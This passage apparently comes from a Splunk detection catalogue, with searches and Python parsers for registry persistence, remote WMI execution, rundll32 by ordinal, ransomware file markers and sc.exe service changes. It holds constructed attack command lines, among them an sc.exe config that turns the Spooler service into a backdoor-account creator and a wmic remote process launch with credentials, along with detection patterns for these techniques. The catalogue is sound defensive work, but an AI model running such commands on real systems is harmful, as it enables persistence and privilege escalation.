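            r"HKLM\SOFTWARE\Microsoft\Netsh\*",
        ],
    },
    "registry_keys_used_for_privilege_escalation": {
        "paths": [r"*Microsoft\Windows NT\CurrentVersion\Image File Execution Options*"],
        "key_names": {"globalflag", "debugger"},
    },
    "registry_keys_for_creating_shim_databases": {
        "paths": [r"*CurrentVersion\AppCompatFlags\Custom*",
                  r"*CurrentVersion\AppCompatFlags\InstalledSDB*"],
    },
}

COMPILED = {name: [spl_wildcard_to_regex(p) for p in spec["paths"]]
            for name, spec in DETECTIONS.items()}


def matching_detections(registry_path, registry_key_name=None):
    """Names of the detections whose path (and, where required, key-name)
    conditions a single registry event satisfies, in definition order.
    An IFEO Debugger write therefore fires both the persistence and the
    privilege-escalation search."""
    hits = []
    for name, spec in DETECTIONS.items():
        if not any(rx.match(registry_path) for rx in COMPILED[name]):
            continue
        required = spec.get("key_names")
        if required and (registry_key_name or "").lower() not in required:
            continue
        hits.append(name)
    return hits


# Constructed registry events: (registry_path, registry_key_name).
SAMPLE_EVENTS = [
    (r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "OneDriveUpdate"),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe", "Debugger"),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe", "UseFilter"),
    (r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\notepad.exe", "{guid}.sdb"),
    (r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler", "ImagePath"),
]

if __name__ == "__main__":
    for path, key in SAMPLE_EVENTS:
        print(matching_detections(path, key) or "-", path, key)
```

The last sample (a service ImagePath change) matches none of the three searches; it is the territory of the reg.exe and sc.exe searches elsewhere on this page, which work from process command lines instead.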

Required field

ATT&CK

ID Technique Tactic
T1546.011 Application Shimming Persistence, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

There are many legitimate applications that leverage shim databases for compatibility purposes for legacy applications.

Reference

Test Dataset


version: 3


Remote desktop process running on system

This search looks for the remote desktop client process mstsc.exe running on systems on which it doesn't typically run. This is accomplished by filtering out all systems that carry the `common_rdp_source` category in the Assets and Identity framework.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1021.001
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process=*mstsc.exe AND Processes.dest_category!=common_rdp_source by Processes.dest Processes.user Processes.process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `remote_desktop_process_running_on_system_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. The search requires you to identify systems that do not commonly use remote desktop. You can use the included support search "Identify Systems Using Remote Desktop" to identify these systems. After identifying them, you will need to add the "common_rdp_source" category to that system using the Enterprise Security Assets and Identities framework. This can be done by adding an entry in the assets.csv file located in `SA-IdentityManagement/lookups`.

Required field

ATT&CK

ID Technique Tactic
T1021.001 Remote Desktop Protocol Lateral Movement


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Remote Desktop may be used legitimately by users on the network.

Reference

Test Dataset

version: 5


Remote process instantiation via wmi

This search looks for wmic.exe being launched with parameters to spawn a process on a remote system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1047
  • Last Updated: 2020-11-30

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = wmic.exe Processes.process="*/node*" Processes.process="*process*" Processes.process="*call*" Processes.process="*create*" by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `remote_process_instantiation_via_wmi_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.
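
The following Python is an added example (not Splunk's code) of what a triage step can pull out of the command lines this search returns. Instead of the four unordered substring tests in the search, it tokenizes a wmic command line, requires the `process call create` verb sequence, and returns the target hosts from `/node:`, the account from `/user:`, whether a `/password:` was passed on the command line (in which case the credential now sits in the 4688 or Sysmon event), and the command spawned on the remote host. The command lines and host names are constructed for the example.

```python
import shlex


def _unquote(token):
    """Strip one pair of surrounding double quotes, if present."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1]
    return token


def parse_wmic_remote_create(cmd_line):
    """Parse a wmic command line.  Returns None unless it is a remote
    process creation (has /node: and the verbs 'process call create');
    otherwise returns the targets, credential use and spawned command.

    shlex runs in non-POSIX mode so Windows backslashes survive and quoted
    arguments stay together as single tokens."""
    tokens = shlex.split(cmd_line, posix=False)
    if not tokens:
        return None
    image = _unquote(tokens[0]).rsplit("\\", 1)[-1].lower()
    if image not in ("wmic", "wmic.exe"):
        return None

    targets, user, password_given, verbs = [], None, False, []
    for tok in tokens[1:]:
        low = tok.lower()
        if low.startswith("/node:"):
            # /node:host or /node:"host1,host2"
            value = _unquote(tok[len("/node:"):])
            targets = [h.strip() for h in value.split(",") if h.strip()]
        elif low.startswith("/user:"):
            user = _unquote(tok[len("/user:"):])
        elif low.startswith("/password:"):
            password_given = True          # value deliberately not copied out
        elif low.startswith("/"):
            continue                       # other global switches, e.g. /output:
        else:
            verbs.append(tok)

    if not targets or [v.lower() for v in verbs[:3]] != ["process", "call", "create"]:
        return None
    return {
        "targets": targets,
        "user": user,
        "password_in_cmdline": password_given,
        "spawned": " ".join(_unquote(t) for t in verbs[3:]),
    }


# Constructed command lines, as they would appear in the 'process' field.
SAMPLES = [
    'wmic /node:"srv01,srv02" /user:ACME\\admin /password:Winter2020! process call create "cmd.exe /c whoami > c:\\out.txt"',
    "wmic /node:srv03 os get caption",           # remote query, no process creation
    "wmic process call create notepad.exe",      # local creation, no /node:
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(parse_wmic_remote_create(sample))
```

The spawned command is the piece worth pivoting on next: search the target hosts for a process whose parent is WmiPrvSE.exe with that command line, which is how a wmic-created process appears on the remote side.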

Required field

ATT&CK

ID Technique Tactic
T1047 Windows Management Instrumentation Execution


Kill Chain Phase

  • Actions on Objectives


Known False Positives

The wmic.exe utility is a benign Windows application. It may be used legitimately by administrators with these parameters for remote system administration, but this is relatively uncommon.

Reference

Test Dataset


version: 5


Rundll loading dll by ordinal

This search looks for executions of rundll32.exe. Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe instead of executing directly may avoid triggering security tools that do not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. The process field carries the DLL path and entry point as rundll32 received them (`<dll>,<entrypoint>`); an entry point written as `#<number>` is a call by ordinal, the form this detection is named for.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2020-11-30

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = rundll32.exe by Processes.process_name Processes.parent_process_name Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `rundll_loading_dll_by_ordinal_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You must also be ingesting logs with both the process name and command line from your endpoints. The command-line arguments are mapped to the "process" field in the Endpoint data model.
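
As an added example, not part of the shipped content, this Python parses the command lines the search returns the way rundll32 reads them: the DLL path up to the first comma (quotes allowed), then the entry point up to the next whitespace, then everything else as the argument string. An entry point written as `#<number>` is a call by ordinal, the case the detection is named for; the example also flags a DLL under a user-writable path (the %AppData% case mentioned under Known False Positives) or one without a .dll extension, since rundll32 loads whatever LoadLibrary accepts. A command line with no comma is treated as having no entry point, which is this example's convention rather than anything the page states. The sample command lines are constructed.

```python
import re

# Image name, optionally quoted or with a full path.
IMAGE_RE = re.compile(r'^\s*("[^"]*"|\S+)')
# <dll>,<entry> [args]: rundll32 splits at the first comma and takes the
# entry point up to the next whitespace; the DLL may be quoted.
ARGS_RE = re.compile(r'^(?P<dll>"[^"]+"|[^\s,]+)\s*,\s*(?P<entry>\S+)(?:\s+(?P<args>.*))?$')
ORDINAL_RE = re.compile(r"^#(\d+)$")
USER_WRITABLE_RE = re.compile(
    r"\\appdata\\|\\users\\[^\\]+\\|\\temp\\|\\programdata\\|\\public\\", re.IGNORECASE)


def parse_rundll32(cmd_line):
    """Return None if the command line does not run rundll32; otherwise a
    dict with the DLL, the entry point, the ordinal (when the entry is #N),
    the argument string and a list of review flags."""
    m = IMAGE_RE.match(cmd_line)
    if not m:
        return None
    image = m.group(1).strip('"').rsplit("\\", 1)[-1].lower()
    if image not in ("rundll32", "rundll32.exe"):
        return None

    rest = cmd_line[m.end():].strip()
    am = ARGS_RE.match(rest)
    if am:
        dll = am.group("dll").strip('"')
        entry = am.group("entry")
        args = am.group("args") or ""
    else:
        # No comma, so no entry point; keep whatever was passed for review.
        parts = rest.split(None, 1)
        dll = parts[0].strip('"') if parts else None
        entry = None
        args = parts[1] if len(parts) > 1 else ""

    om = ORDINAL_RE.match(entry) if entry else None
    ordinal = int(om.group(1)) if om else None

    flags = []
    if ordinal is not None:
        flags.append("entry_by_ordinal")
    if dll and USER_WRITABLE_RE.search(dll):
        flags.append("dll_in_user_writable_path")
    if dll and not dll.lower().endswith(".dll"):
        flags.append("dll_without_dll_extension")
    return {"dll": dll, "entry": entry, "ordinal": ordinal, "args": args, "flags": flags}


# Constructed command lines as they would appear in the 'process' field.
SAMPLES = [
    r'rundll32.exe "C:\Users\jdoe\AppData\Roaming\upd.dat",#2 /s',
    r'C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL desk.cpl',
    "rundll32.exe",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(parse_rundll32(sample))
```

The second sample is the everyday Control Panel launch and produces no flags, which is the kind of volume the filter macro exists to remove; the first produces all three and is worth a look regardless of the DLL's name.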

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Installation


Known False Positives

While not common, loading a DLL under %AppData% and calling a function by ordinal is possible from a legitimate process.

Reference

Test Dataset


version: 4


Ryuk test files detected

The search looks for files whose path contains the string "Ryuk" anywhere under the C: drive, which is consistent with Ryuk propagation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1486
  • Last Updated: 2020-11-06

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem WHERE "Filesystem.file_path"=C:\\*Ryuk* BY "Filesystem.dest", "Filesystem.user", "Filesystem.file_path" | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `ryuk_test_files_detected_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data-model object. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

  • Delivery


Known False Positives

If there are files with this keyword in their names, they might trigger false positives; use the filter macro to tune out potential FPs.

Reference

Test Dataset


version: 1


Samsam test file write

The search looks for a file named "test.txt" written to the windows system directory tree, which is consistent with Samsam propagation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1486
  • Last Updated: 2018-12-14

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_name) as file_name from datamodel=Endpoint.Filesystem where Filesystem.file_path=*\\windows\\system32\\test.txt by Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `samsam_test_file_write_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records the file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.

Required field

ATT&CK

ID Technique Tactic
T1486 Data Encrypted for Impact Impact


Kill Chain Phase

  • Delivery


Known False Positives

No false positives have been identified.

Reference

Test Dataset


version: 1


Sc exe manipulating windows services

This search looks for arguments to sc.exe indicating the creation or modification of a Windows service.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1543.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = sc.exe (Processes.process="* create *" OR Processes.process="* config *") by Processes.process_name Processes.parent_process_name Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `sc_exe_manipulating_windows_services_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting process-activity data from your endpoints, including the process name and the full command line, into the `Endpoint` data model's `Processes` node.
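
As an added example that is not Splunk's code, the Python below parses the sc.exe command lines this search returns into the verb (create or config), the service name, an optional target server, and the `key= value` options, then derives a few review flags from them. It relies on sc's quirk that each option keyword ends with `=` and its value follows after a space (`binPath= "C:\svc.exe"`), so the keyword and the value arrive as separate tokens. The command lines, service names and host names are constructed.

```python
import shlex

# Interpreters that should not be a service's binPath on their own.
SHELL_IMAGES = {"cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh", "pwsh.exe",
                "rundll32", "rundll32.exe", "mshta", "mshta.exe", "regsvr32", "regsvr32.exe"}
USER_WRITABLE = ("\\users\\", "\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


def _unquote(token):
    """Strip one pair of surrounding double quotes, if present."""
    if len(token) >= 2 and token[0] == '"' and token[-1] == '"':
        return token[1:-1]
    return token


def parse_sc_command(cmd_line):
    """Parse 'sc [\\\\server] create|config <service> key= value ...'.
    Returns None for any other sc invocation (query, start, delete, ...)."""
    tokens = shlex.split(cmd_line, posix=False)   # keep backslashes and quotes
    if not tokens:
        return None
    image = _unquote(tokens[0]).rsplit("\\", 1)[-1].lower()
    if image not in ("sc", "sc.exe"):
        return None
    i, server = 1, None
    if i < len(tokens) and tokens[i].startswith("\\\\"):
        server = tokens[i][2:]
        i += 1
    if i + 1 >= len(tokens):
        return None
    verb = tokens[i].lower()
    if verb not in ("create", "config"):
        return None
    service = _unquote(tokens[i + 1])
    options = {}
    i += 2
    while i < len(tokens):
        tok = tokens[i]
        if len(tok) > 1 and tok.endswith("="):
            # sc requires the space after '=', so the value is the next token.
            options[tok[:-1].lower()] = _unquote(tokens[i + 1]) if i + 1 < len(tokens) else ""
            i += 2
        else:
            i += 1            # sc itself would reject a stray token; skip it here
    return {"server": server, "verb": verb, "service": service, "options": options}


def suspicious_indicators(parsed):
    """Review flags for a parsed create/config command, in a fixed order."""
    flags = []
    binpath = parsed["options"].get("binpath", "")
    low = binpath.lower()
    first_image = low.split()[0].strip('"').rsplit("\\", 1)[-1] if low else ""
    if first_image in SHELL_IMAGES:
        flags.append("binpath_runs_shell")
    if any(p in low for p in USER_WRITABLE):
        flags.append("binpath_in_user_writable_path")
    if parsed["options"].get("start", "").lower() in ("auto", "delayed-auto", "boot", "system"):
        flags.append("starts_automatically")
    if parsed["verb"] == "config" and binpath:
        flags.append("existing_service_binpath_changed")
    return flags


# Constructed command lines as they would appear in the 'process' field.
SAMPLES = [
    'sc.exe create evilsvc binPath= "C:\\Users\\Public\\svc.exe" start= auto DisplayName= "Windows Update Helper"',
    'sc \\\\srv01 config Spooler binPath= "cmd.exe /c net user bk P@ssw0rd! /add"',
    "sc query Spooler",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        parsed = parse_sc_command(sample)
        print(parsed, suspicious_indicators(parsed) if parsed else "-")
```

The second sample is the classic pattern of pointing an existing service at a shell one-liner so the Service Control Manager runs it as SYSTEM; the service then fails to start, which is why a config with a shell binPath deserves the same attention as a create.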

Required field

ATT&CK

ID Technique Tactic
T1543.003 Windows Service Persistence, Privilege Escalation


Kill Chain Phase

  • Installation


Known False Positives

Using sc.exe to manipulate Windows services is uncommon. However, there may be legitimate instances of this behavior. It is important to validate and investigate as appropriate.

Reference

Test Dataset


version: 4